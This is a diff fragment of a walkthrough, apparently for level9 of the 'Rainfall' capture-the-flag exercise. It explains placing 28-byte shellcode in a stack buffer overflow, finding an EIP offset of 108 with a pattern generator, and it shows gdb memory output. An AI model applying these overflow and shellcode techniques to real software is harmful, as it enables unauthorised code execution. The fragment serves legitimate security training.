Zeusomos/bonds/Rainfall/level9/walkthrough.md

 	 804807a: cd 80                 int    $0x80	;restart_syscall()

 Shellcode length is 28 bytes that is very important because we need to count where to put it so that it is executed and does not break the programm.
 We count where to put the shellcode while counting `EIP` offset.
 This we can do with the help of special strings: https://wiremask.eu/tools/buffer-overflow-pattern-generator/.
-We get address 0x41366441 that means that
+We get address 0x41366441 that means that offset is 108:

+	Breakpoint 6, 0x08048677 in main ()
+	(gdb) x/50wx $ebp+0xc
+		0xbffff644:	0xbffff6d4	0xbffff6e0